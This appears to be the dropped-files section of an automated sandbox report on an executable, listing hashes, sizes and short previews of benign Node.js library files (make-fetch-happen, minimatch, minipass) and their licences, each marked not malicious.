              SHA1:2A0DDC0425EAF4F86931D029801310170B60DC21
              SHA-256:AE7DA8B3FBC282391FC70DF8A625DE765062F955FC85587E575479CBE9C33ADB
              SHA-512:0AB8D2E44E475D87E20CDB13B0EA3155C997D3801E1CFE2CC8B0AD5B33CA5B216AB91118ED98E39C9FBC484413E2BB0BFC4C0960BDE054B147B0D9F564F80F78
              Malicious:false
              Reputation:unknown
              Preview:const { URL, format } = require('url')..// options passed to url.format() when generating a key.const formatOptions = {. auth: false,. fragment: false,. search: true,. unicode: false,.}..// returns a string to be used as the cache key for the Request.const cacheKey = (request) => {. const parsed = new URL(request.url). return `make-fetch-happen:request-cache:${format(parsed, formatOptions)}`.}..module.exports = cacheKey.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):4527
              Entropy (8bit):4.636024375417223
              Encrypted:false
              SSDEEP:
              MD5:774A5575A064F93358C0131E1516F2D3
              SHA1:BE4954EEBC2F3E82B2BEA8EB055B2A9DDEB04F3B
              SHA-256:2014CF549FCEB8808CBA81E8760315B9060F502B6C62B7CB79E1B024ABDE54C3
              SHA-512:08380AE15980F1860453D8CC959F9608756448C423E61903645E5505789CBD676446F343131CC3DCE0591A18AD46637C79069A904BFDA67C531B60767535FFED
              Malicious:false
              Reputation:unknown
              Preview:const CacheSemantics = require('http-cache-semantics').const Negotiator = require('negotiator').const ssri = require('ssri')..// options passed to http-cache-semantics constructor.const policyOptions = {. shared: false,. ignoreCargoCult: true,.}..// a fake empty response, used when only testing the.// request for storability.const emptyResponse = { status: 200, headers: {} }..// returns a plain object representation of the Request.const requestObject = (request) => {. const _obj = {. method: request.method,. url: request.url,. headers: {},. compress: request.compress,. }.. request.headers.forEach((value, key) => {. _obj.headers[key] = value. }).. return _obj.}..// returns a plain object representation of the Response.const responseObject = (response) => {. const _obj = {. status: response.status,. headers: {},. }.. response.headers.forEach((value, key) => {. _obj.headers[key] = value. }).. return _obj.}..class CachePolicy {. constructor ({ entry, re
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1173
              Entropy (8bit):4.678046206841763
              Encrypted:false
              SSDEEP:
              MD5:7E3E9EBE32C88938F58CA7A9FA3ED7EE
              SHA1:72DA3FD8D65A9E200DE8672128CD0D21061C61E0
              SHA-256:C6FA07E324498F7BBD05E98892790186556BF55C6265D0C07F45900A6941A57C
              SHA-512:8E8F006929B3AF87067FEFF533B9EBE6E4BBF1B0710359F494D098F8B14B735357B06B8A44072C5D59FD368F556E5C397D9DC01E10BA1C2396D823C9F56318AF
              Malicious:false
              Reputation:unknown
              Preview:const { FetchError, Headers, Request, Response } = require('minipass-fetch')..const configureOptions = require('./options.js').const fetch = require('./fetch.js')..const makeFetchHappen = (url, opts) => {. const options = configureOptions(opts).. const request = new Request(url, options). return fetch(request, options).}..makeFetchHappen.defaults = (defaultUrl, defaultOptions = {}, wrappedFetch = makeFetchHappen) => {. if (typeof defaultUrl === 'object') {. defaultOptions = defaultUrl. defaultUrl = null. }.. const defaultedFetch = (url, options = {}) => {. const finalUrl = url || defaultUrl. const finalOptions = {. ...defaultOptions,. ...options,. headers: {. ...defaultOptions.headers,. ...options.headers,. },. }. return wrappedFetch(finalUrl, finalOptions). }.. defaultedFetch.defaults = (defaultUrl1, defaultOptions1 = {}) =>. makeFetchHappen.defaults(defaultUrl1, defaultOptions1, defaultedFetch). return defaultedFetch.}..
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1533
              Entropy (8bit):4.669410727985055
              Encrypted:false
              SSDEEP:
              MD5:16711C8AA197848D7C071435E13B81FE
              SHA1:56535F0265E740EAD3DF79FA3641F5F6E5653EDF
              SHA-256:C367C2CE4CFFB1C43462B7B0AB1EA73B43E0E0E7B6F7517327957799243EFD35
              SHA-512:85902F7BE029184AB556561019B9EB005D4367CA7ED24E84CB783077D695E46D63C8ADFB5E07BFFE71C8047B7B396D3B0401FF1D5FA8E7865566107F7E450AD7
              Malicious:false
              Reputation:unknown
              Preview:const dns = require('dns')..const conditionalHeaders = [. 'if-modified-since',. 'if-none-match',. 'if-unmodified-since',. 'if-match',. 'if-range',.]..const configureOptions = (opts) => {. const { strictSSL, ...options } = { ...opts }. options.method = options.method ? options.method.toUpperCase() : 'GET'. options.rejectUnauthorized = strictSSL !== false.. if (!options.retry) {. options.retry = { retries: 0 }. } else if (typeof options.retry === 'string') {. const retries = parseInt(options.retry, 10). if (isFinite(retries)) {. options.retry = { retries }. } else {. options.retry = { retries: 0 }. }. } else if (typeof options.retry === 'number') {. options.retry = { retries: options.retry }. } else {. options.retry = { retries: 0, ...options.retry }. }.. options.dns = { ttl: 5 * 60 * 1000, lookup: dns.lookup, ...options.dns }.. options.cache = options.cache || 'default'. if (options.cache === 'default') {. const hasConditionalHeader = Ob
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):4277
              Entropy (8bit):4.801355700678475
              Encrypted:false
              SSDEEP:
              MD5:8F8147D225BE9EBF9D6DB344612AEE9E
              SHA1:B0EB0152D0E886A46292DEA36E268DBE5D05B0F9
              SHA-256:F668A76FD50A291751190292679A094D6F4FDF3B60678BF3F1E8BD3941F51516
              SHA-512:030F2EA3A2E0CA9A92472867500DFE289B6E7FED57AB81989C54CB2630857BFF07564C8CD18D96BB6BD672194C79AC79C22391C88FBDF5B453066BE032E1400A
              Malicious:false
              Reputation:unknown
              Preview:const { Minipass } = require('minipass').const fetch = require('minipass-fetch').const promiseRetry = require('promise-retry').const ssri = require('ssri')..const CachingMinipassPipeline = require('./pipeline.js').const { getAgent } = require('@npmcli/agent').const pkg = require('../package.json')..const USER_AGENT = `${pkg.name}/${pkg.version} (+https://npm.im/${pkg.name})`..const RETRY_ERRORS = [. 'ECONNRESET', // remote socket closed on us. 'ECONNREFUSED', // remote host refused to open connection. 'EADDRINUSE', // failed to bind to a local port (proxy?). 'ETIMEDOUT', // someone in the transaction is WAY TOO SLOW. // from @npmcli/agent. 'ECONNECTIONTIMEOUT',. 'EIDLETIMEOUT',. 'ERESPONSETIMEOUT',. 'ETRANSFERTIMEOUT',. // Known codes we do NOT retry on:. // ENOTFOUND (getaddrinfo failure. Either bad hostname, or offline). // EINVALIDPROXY // invalid protocol from @npmcli/agent. // EINVALIDRESPONSE // invalid status code from @npmcli/agent.]..const RETRY_TYPES = [. 'reque
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1816
              Entropy (8bit):4.650637180389374
              Encrypted:false
              SSDEEP:
              MD5:E1F5014D02BA9451F4A6FB135066AE5D
              SHA1:F7E8BF5305E70BB62F00FB0FF1FFA410667A5B6D
              SHA-256:3DF1D255EAAE17588B9FD188981018BC363D833898F75D03D61F7BC486DD93EA
              SHA-512:4CA601AB42293E99C2286AA08BD3FCF9F85A75D95A3D00AD97D9530EBBF2DBAD620CCE56E2C5B967B9C4781BA29232442802645154768E76F1471EC2F388036F
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "make-fetch-happen",. "version": "13.0.0",. "description": "Opinionated, caching, retrying fetch client",. "main": "lib/index.js",. "files": [. "bin/",. "lib/". ],. "scripts": {. "test": "tap",. "posttest": "npm run lint",. "eslint": "eslint",. "lint": "eslint \"**/*.js\"",. "lintfix": "npm run lint -- --fix",. "postlint": "template-oss-check",. "snap": "tap",. "template-oss-apply": "template-oss-apply --force". },. "repository": {. "type": "git",. "url": "https://github.com/npm/make-fetch-happen.git". },. "keywords": [. "http",. "request",. "fetch",. "mean girls",. "caching",. "cache",. "subresource integrity". ],. "author": "GitHub Inc.",. "license": "ISC",. "dependencies": {. "@npmcli/agent": "^2.0.0",. "cacache": "^18.0.0",. "http-cache-semantics": "^4.1.1",. "is-lambda": "^1.0.1",. "minipass": "^7.0.2",. "minipass-fetch": "^3.0.0",. "minipass-flush": "^1.0.5",. "minipass-pipe
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):775
              Entropy (8bit):5.055451430709965
              Encrypted:false
              SSDEEP:
              MD5:8B78835EA26F80C9067A0E80A294D926
              SHA1:6747ABC818A407B412CE84D42BED5AA636A1E393
              SHA-256:D11323827FA4EDEAAFC437CC5B91B6971B335F0127EFEEB42BF5122FE8657E8F
              SHA-512:C137E773CB3845ACB97762D0E563ABC298D30A21606D64027A3479E460A26A1C70D6D9E657B5093141FE19FA1796F7268E7FA17737CE695FF491B8ADF4634124
              Malicious:false
              Reputation:unknown
              Preview:The ISC License..Copyright (c) 2011-2023 Isaac Z. Schlueter and Contributors..Permission to use, copy, modify, and/or distribute this software for any.purpose with or without fee is hereby granted, provided that the above.copyright notice and this permission notice appear in all copies...THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES.WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF.MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR.ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES.WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN.ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR.IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE..
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):968
              Entropy (8bit):4.824472789574183
              Encrypted:false
              SSDEEP:
              MD5:CC18744AA1949F163346B1B38F450FCB
              SHA1:D3DC72964FEC4828762FE5B133A020EBA1716159
              SHA-256:55E384815856F5708DAD6E501AA47314BC08DCB4B90D11DB85E413716F948C17
              SHA-512:3346232AC18B6511BE80957EFEAF7385C07A3ACC036E2AA54AB38B57F023C8E7769937AAA3596C13C330A894D4F0E7427EE1ED0DA7C1E4EB7534B37B8F1B40A2
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.escape = void 0;./**. * Escape all magic characters in a glob pattern.. *. * If the {@link windowsPathsNoEscape | GlobOptions.windowsPathsNoEscape}. * option is used, then characters are escaped by wrapping in `[]`, because. * a magic character wrapped in a character class can only be satisfied by. * that exact character. In this mode, `\` is _not_ escaped, because it is. * not interpreted as a magic character, but instead as a path separator.. */.const escape = (s, { windowsPathsNoEscape = false, } = {}) => {. // don't need to escape +@! because we escape the parens. // that make those magic, and escaping ! as [!] isn't valid,. // because [!]] is a valid glob class meaning not ']'.. return windowsPathsNoEscape. ? s.replace(/[?*()[\]]/g, '[$&]'). : s.replace(/[?*()[\]\\]/g, '\\$&');.};.exports.escape = escape;.//# sourceMappingURL=escape.js.map
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):40340
              Entropy (8bit):4.301990190088392
              Encrypted:false
              SSDEEP:
              MD5:DC7223E01065D0F6AF09D5B4663B34C7
              SHA1:1FB4A830868BBFDF43AE35905A7F7192D4A27800
              SHA-256:28B08ACB90234D746C997B9C164ED8CB30B9997816706E18672914F6738EF817
              SHA-512:414DD2CEBE08B8B0C3B57253ED57021DCFFBB87972EAFAD6EFC0AD90ECF5F56174A368CC1A15D9C57ABA5490BDF78A53FFDB6CE919C2F04CD165DA1674708822
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __importDefault = (this && this.__importDefault) || function (mod) {. return (mod && mod.__esModule) ? mod : { "default": mod };.};.Object.defineProperty(exports, "__esModule", { value: true });.exports.unescape = exports.escape = exports.AST = exports.Minimatch = exports.match = exports.makeRe = exports.braceExpand = exports.defaults = exports.filter = exports.GLOBSTAR = exports.sep = exports.minimatch = void 0;.const brace_expansion_1 = __importDefault(require("brace-expansion"));.const assert_valid_pattern_js_1 = require("./assert-valid-pattern.js");.const ast_js_1 = require("./ast.js");.const escape_js_1 = require("./escape.js");.const unescape_js_1 = require("./unescape.js");.const minimatch = (p, pattern, options = {}) => {. (0, assert_valid_pattern_js_1.assertValidPattern)(pattern);. // shortcut: comments match nothing.. if (!options.nocomment && pattern.charAt(0) === '#') {. return false;. }. return new Minimatch(pattern, options).matc
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):973
              Entropy (8bit):4.999832928932337
              Encrypted:false
              SSDEEP:
              MD5:2CAFB9340AA6FD34E3945A3B84359EE2
              SHA1:A18C8824BB49BCAA2482D76B19ACAC82C2407B72
              SHA-256:FF3E0DD4664576CFE078C3B494724D7CF2F691CDF960304E354E7C34FA6B5A30
              SHA-512:92326E94E6C995DEB91C85B33CC74B125A8A4EF6F5BCD503C78BBA414333D674E799313AF8BEEA348ABEC6A735777C9ED010AC1CFB8E2104CF9461A63EF6C3B0
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.unescape = void 0;./**. * Un-escape a string that has been escaped with {@link escape}.. *. * If the {@link windowsPathsNoEscape} option is used, then square-brace. * escapes are removed, but not backslash escapes. For example, it will turn. * the string `'[*]'` into `*`, but it will not turn `'\\*'` into `'*'`,. * becuase `\` is a path separator in `windowsPathsNoEscape` mode.. *. * When `windowsPathsNoEscape` is not set, then both brace escapes and. * backslash escapes are removed.. *. * Slashes (and backslashes in `windowsPathsNoEscape` mode) cannot be escaped. * or unescaped.. */.const unescape = (s, { windowsPathsNoEscape = false, } = {}) => {. return windowsPathsNoEscape. ? s.replace(/\[([^\/\\])\]/g, '$1'). : s.replace(/((?!\\).|^)\[([^\/\\])\]/g, '$1$2').replace(/\\([^\/])/g, '$1');.};.exports.unescape = unescape;.//# sourceMappingURL=unescape.js.map
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):336
              Entropy (8bit):4.943151127465994
              Encrypted:false
              SSDEEP:
              MD5:5AF2307C9F65DF0947876C2416EE2DE9
              SHA1:ABBEBBA963ECCB1DE0125C300F0053AE52A0E0FF
              SHA-256:90E8D3327D573B9D2391EDF03DC7D50C1C0B468D720A4C0FB4A08A36EE5C50DC
              SHA-512:8CDB9E1B3E13CFDDC8CDB3522AD12F19D7BFEF613EC2CA439AB1F2E676EA12E2C51032DD11236E695A7E6C3570C47D6F2B3A2FA14B6D1E48B017B8163688348A
              Malicious:false
              Reputation:unknown
              Preview:const MAX_PATTERN_LENGTH = 1024 * 64;.export const assertValidPattern = (pattern) => {. if (typeof pattern !== 'string') {. throw new TypeError('invalid pattern');. }. if (pattern.length > MAX_PATTERN_LENGTH) {. throw new TypeError('pattern is too long');. }.};.//# sourceMappingURL=assert-valid-pattern.js.map
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Java source, ASCII text
              Category:dropped
              Size (bytes):22532
              Entropy (8bit):4.125238254010979
              Encrypted:false
              SSDEEP:
              MD5:C28E9CACB85877ABD715ADF4EC90B493
              SHA1:A8C967DA659C72B4258228A94DF845F8D2AAEAB0
              SHA-256:B375321C807DCD2FC7C3EF4BB681EBC7B7616649E94F07C11D7AD07AEBE0C1E6
              SHA-512:04F8CE15B36D8B2DCD418EB63C1C93FA0CD235C3420C61BDF165B2F8AEC0DBA53C93A783F4F5F06EDCE719F964176661887409ED90402E0D544EF10AF41509D8
              Malicious:false
              Reputation:unknown
              Preview:// parse a single path portion.import { parseClass } from './brace-expressions.js';.import { unescape } from './unescape.js';.const types = new Set(['!', '?', '+', '*', '@']);.const isExtglobType = (c) => types.has(c);.// Patterns that get prepended to bind to the start of either the.// entire string, or just a single path portion, to prevent dots.// and/or traversal patterns, when needed..// Exts don't need the ^ or / bit, because the root binds that already..const startNoTraversal = '(?!(?:^|/)\\.\\.?(?:$|/))';.const startNoDot = '(?!\\.)';.// characters that indicate a start of pattern needs the "no dots" bit,.// because a dot *might* be matched. ( is not in the list, because in.// the case of a child extglob, it will handle the prevention itself..const addPatternStart = new Set(['[', '.']);.// cases where traversal is A-OK, no dot prevention needed.const justDots = new Set(['..', '.']);.const reSpecials = new Set('().*{}+?[]^$\\!');.const regExpEscape = (s) => s.replace(/[-[\]{}()*
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):5631
              Entropy (8bit):4.457251414944262
              Encrypted:false
              SSDEEP:
              MD5:DAB069B04669DF351D09AAFD8F4F8469
              SHA1:4CDC912BC00F103D441DE4B52F3E9F7ED9D2494C
              SHA-256:E99F6C57070874422DAE185154539C9B33A6FB34E2A12EEBAC8626DD0AB35204
              SHA-512:EDFA10CDA1B60908A145CCD6D2A02EE94EF4FAF3E609EA608E4ED9782905136D009E4CB7EE6668484B880062CDD9BF52BE2A9AD37184C539F61308709D1AE1FA
              Malicious:false
              Reputation:unknown
              Preview:// translate the various posix character classes into unicode properties.// this works across all unicode locales.// { <posix class>: [<translation>, /u flag required, negated].const posixClasses = {. '[:alnum:]': ['\\p{L}\\p{Nl}\\p{Nd}', true],. '[:alpha:]': ['\\p{L}\\p{Nl}', true],. '[:ascii:]': ['\\x' + '00-\\x' + '7f', false],. '[:blank:]': ['\\p{Zs}\\t', true],. '[:cntrl:]': ['\\p{Cc}', true],. '[:digit:]': ['\\p{Nd}', true],. '[:graph:]': ['\\p{Z}\\p{C}', true, true],. '[:lower:]': ['\\p{Ll}', true],. '[:print:]': ['\\p{C}', true],. '[:punct:]': ['\\p{P}', true],. '[:space:]': ['\\p{Z}\\t\\r\\n\\v\\f', true],. '[:upper:]': ['\\p{Lu}', true],. '[:word:]': ['\\p{L}\\p{Nl}\\p{Nd}\\p{Pc}', true],. '[:xdigit:]': ['A-Fa-f0-9', false],.};.// only need to escape a few things inside of brace expressions.// escapes: [ \ ] -.const braceEscape = (s) => s.replace(/[[\]\\-]/g, '\\$&');.// escape all regexp magic characters.const regexpEscape = (s) => s
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):848
              Entropy (8bit):4.749264662566494
              Encrypted:false
              SSDEEP:
              MD5:B5B102E0BD95E81CC2C8F4D05829454F
              SHA1:3DC465582689B8F8BB931ED47C772A3E60A5BC39
              SHA-256:1E510823C9FBC36771C4C1B5EDC1A4A5FCE1CC443634C19A843D02280ACD4639
              SHA-512:B4762F81DC33A6BADB19832AE145A4F1768C9615292F2DB1ECFEBA9B78839878D6D0323EB9B3EE3AE8B08E45E6B871E04F43A964D1FE999F6E05C209FC53DA11
              Malicious:false
              Reputation:unknown
              Preview:/**. * Escape all magic characters in a glob pattern.. *. * If the {@link windowsPathsNoEscape | GlobOptions.windowsPathsNoEscape}. * option is used, then characters are escaped by wrapping in `[]`, because. * a magic character wrapped in a character class can only be satisfied by. * that exact character. In this mode, `\` is _not_ escaped, because it is. * not interpreted as a magic character, but instead as a path separator.. */.export const escape = (s, { windowsPathsNoEscape = false, } = {}) => {. // don't need to escape +@! because we escape the parens. // that make those magic, and escaping ! as [!] isn't valid,. // because [!]] is a valid glob class meaning not ']'.. return windowsPathsNoEscape. ? s.replace(/[?*()[\]]/g, '[$&]'). : s.replace(/[?*()[\]\\]/g, '\\$&');.};.//# sourceMappingURL=escape.js.map
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Java source, ASCII text
              Category:dropped
              Size (bytes):38881
              Entropy (8bit):4.246879396190987
              Encrypted:false
              SSDEEP:
              MD5:C9B7FF364AD1BBAAB2FEE3D465655142
              SHA1:07B0393DACDF8A3CA3F44B5A10EC47E713AE3A85
              SHA-256:ED7A1223DE520F40942A5C7421E74CBFD054001C14506E9A70F8A44CA4DA0E1E
              SHA-512:42392C038CE754A1F496977A977CEB470A86F2CE3ECA2CB9B762A407E8047770D5CDD8E9BA0CF53704CD596C379A127676856BDF28BE1ED545640B6D5B122EDF
              Malicious:false
              Reputation:unknown
              Preview:import expand from 'brace-expansion';.import { assertValidPattern } from './assert-valid-pattern.js';.import { AST } from './ast.js';.import { escape } from './escape.js';.import { unescape } from './unescape.js';.export const minimatch = (p, pattern, options = {}) => {. assertValidPattern(pattern);. // shortcut: comments match nothing.. if (!options.nocomment && pattern.charAt(0) === '#') {. return false;. }. return new Minimatch(pattern, options).match(p);.};.// Optimized checking for the most common glob patterns..const starDotExtRE = /^\*+([^+@!?\*\[\(]*)$/;.const starDotExtTest = (ext) => (f) => !f.startsWith('.') && f.endsWith(ext);.const starDotExtTestDot = (ext) => (f) => f.endsWith(ext);.const starDotExtTestNocase = (ext) => {. ext = ext.toLowerCase();. return (f) => !f.startsWith('.') && f.toLowerCase().endsWith(ext);.};.const starDotExtTestNocaseDot = (ext) => {. ext = ext.toLowerCase();. return (f) => f.toLowerCase().endsWith(ext);.};.const
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):847
              Entropy (8bit):4.935570218397068
              Encrypted:false
              SSDEEP:
              MD5:BE82715B6EBF1A248801A93D0707DA9C
              SHA1:EB5089A9AEFF7243EF768BF86EA0BFF54997410D
              SHA-256:4C52110A7053CA74D659226519E2D977D10CCBBA0305D514D2AEFFA78E1583F5
              SHA-512:04257C3380348190DDADCB36DD1955C085B91C4F9BBA389CEC2C112450FE3830506AE857F838543B731CEF0FD1DDF749E224C9F1D0082A1D0DD00EE5478E72AF
              Malicious:false
              Reputation:unknown
              Preview:/**. * Un-escape a string that has been escaped with {@link escape}.. *. * If the {@link windowsPathsNoEscape} option is used, then square-brace. * escapes are removed, but not backslash escapes. For example, it will turn. * the string `'[*]'` into `*`, but it will not turn `'\\*'` into `'*'`,. * becuase `\` is a path separator in `windowsPathsNoEscape` mode.. *. * When `windowsPathsNoEscape` is not set, then both brace escapes and. * backslash escapes are removed.. *. * Slashes (and backslashes in `windowsPathsNoEscape` mode) cannot be escaped. * or unescaped.. */.export const unescape = (s, { windowsPathsNoEscape = false, } = {}) => {. return windowsPathsNoEscape. ? s.replace(/\[([^\/\\])\]/g, '$1'). : s.replace(/((?!\\).|^)\[([^\/\\])\]/g, '$1$2').replace(/\\([^\/])/g, '$1');.};.//# sourceMappingURL=unescape.js.map
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1990
              Entropy (8bit):4.626953078993463
              Encrypted:false
              SSDEEP:
              MD5:9251E3544B0DA38463C032000AE5B0AD
              SHA1:E561B2E7173271CD78C6FEC9DB8C9172AD9572C1
              SHA-256:C0BE2F026E526F10D430FDDFA7B953888C42935D8F780C7BADB2CA55B9BCBE3C
              SHA-512:3B01F3EC4A948885D02813AE11DC39688AD0BDA0E654589B228C54DCF8A50F6E5CE6670F1A14700EE02EB85C037C31DD5E71BECCD3844E108028ECAD76122E85
              Malicious:false
              Reputation:unknown
              Preview:const Minipass = require('minipass').const _data = Symbol('_data').const _length = Symbol('_length').class Collect extends Minipass {. constructor (options) {. super(options). this[_data] = []. this[_length] = 0. }. write (chunk, encoding, cb) {. if (typeof encoding === 'function'). cb = encoding, encoding = 'utf8'.. if (!encoding). encoding = 'utf8'.. const c = Buffer.isBuffer(chunk) ? chunk : Buffer.from(chunk, encoding). this[_data].push(c). this[_length] += c.length. if (cb). cb(). return true. }. end (chunk, encoding, cb) {. if (typeof chunk === 'function'). cb = chunk, chunk = null. if (typeof encoding === 'function'). cb = encoding, encoding = 'utf8'. if (chunk). this.write(chunk, encoding). const result = Buffer.concat(this[_data], this[_length]). super.write(result). return super.end(cb). }.}.module.exports = Collect..// it would be possible to DRY this a bit by doing something like.// this.col
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):787
              Entropy (8bit):5.062587829448254
              Encrypted:false
              SSDEEP:
              MD5:78E0C554693F15C5D2E74A90DFEF3816
              SHA1:58823CE936D14F068797501B1174D8EA9E51E9FE
              SHA-256:A5A110EB524BF3217958E405B5E3411277E915A2F5902C330348877000337E53
              SHA-512:B38EBCF2AF28488DBF1D3AA6A40F41A8AF4893AD6CB8629125E41B2D52C6D501283D882F750FC8323517C4EB3953D89FA0F3C8CEBA2AE66A8BF95AE676474F09
              Malicious:false
              Reputation:unknown
              Preview:The ISC License..Copyright (c) 2017-2022 npm, Inc., Isaac Z. Schlueter, and Contributors..Permission to use, copy, modify, and/or distribute this software for any.purpose with or without fee is hereby granted, provided that the above.copyright notice and this permission notice appear in all copies...THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES.WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF.MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR.ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES.WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN.ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR.IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE..
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):609
              Entropy (8bit):4.575171277329013
              Encrypted:false
              SSDEEP:
              MD5:560296B2053B0678DB48401F4D9895EB
              SHA1:FF5C7864735844778D9F653604AC1754604F89C4
              SHA-256:A0F049A58DBF9FD58E9B4686DB2D51200CDEA584C9B6425B400FAA24133ACE25
              SHA-512:90983EA06605B4C9659AA332EB8675D700362187AA67C9C33B327F5BE2C13F15B9DA86A60D7BDB50A3850746F1AA41C6A03C54C54918A1C20E84705A1C830670
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "minipass-collect",. "version": "1.0.2",. "description": "A Minipass stream that collects all the data into a single chunk",. "author": "Isaac Z. Schlueter <i@izs.me> (https://izs.me)",. "license": "ISC",. "scripts": {. "test": "tap",. "snap": "tap",. "preversion": "npm test",. "postversion": "npm publish",. "postpublish": "git push origin --follow-tags". },. "tap": {. "check-coverage": true. },. "devDependencies": {. "tap": "^14.6.9". },. "dependencies": {. "minipass": "^3.0.0". },. "files": [. "index.js". ],. "engines": {. "node": ">= 8". }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1308
              Entropy (8bit):5.151688162194879
              Encrypted:false
              SSDEEP:
              MD5:F27CFD601484054495697BA3D54DE66A
              SHA1:3B3F7641724FC82333C4124947FFFA0FF46A5967
              SHA-256:1DEDEE6F84F5875CE4DC398D4D767274EB952A43CFD510A6ADA856B2ED347472
              SHA-512:DFF1DE86E1D5DE46DEFB9A76231054F42799BE7DAE1233A0AD164187AC3AB7117C0EEA1D2CCD6992D6BC72C1E0148A0463557BFD6E6671C95DDFE7F988F96E77
              Malicious:false
              Reputation:unknown
              Preview:The MIT License (MIT)..Copyright (c) Isaac Z. Schlueter and Contributors.Copyright (c) 2016 David Frank..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CON
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):362
              Entropy (8bit):4.568071860999748
              Encrypted:false
              SSDEEP:
              MD5:CA763653772AEDBC36AFE0DE68549DE0
              SHA1:A516910BD61D81659ACF7B4D43C0F427DECE4535
              SHA-256:BEEF50FEA16C75E829BB5288E8135D0C8D5E9C1425C123978DD38A2754AFC007
              SHA-512:D5E1FEC7EDC1CED6031715134BC0772920003E6835125117B7048282C847C616E6834C3D8F9EE92E0C7070597F6BE5319AB36920FAAF3C15E4A08DCB968E7C5A
              Malicious:false
              Reputation:unknown
              Preview:'use strict'.class AbortError extends Error {. constructor (message) {. super(message). this.code = 'FETCH_ABORTED'. this.type = 'aborted'. Error.captureStackTrace(this, this.constructor). }.. get name () {. return 'AbortError'. }.. // don't allow name to be overridden, but don't throw either. set name (s) {}.}.module.exports = AbortError.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):2334
              Entropy (8bit):4.6956790109741835
              Encrypted:false
              SSDEEP:
              MD5:C1B03ECB44F6EC956C0992C551E3A8E0
              SHA1:58FE7722A3C8F7771C64CB68977E08031910B7CB
              SHA-256:F53CB813C7F8159FB10BAFC8A20181C65797DED22D5E350511AB2F847B2DB861
              SHA-512:5836EE9102CFC8D94D8EED99339F925329324A0A70C6174E37E5FE7663F47B49B5C2B32E79CFD390954BEB4EC5C9B47BCA32A87043F0C00C925447A7A8E53408
              Malicious:false
              Reputation:unknown
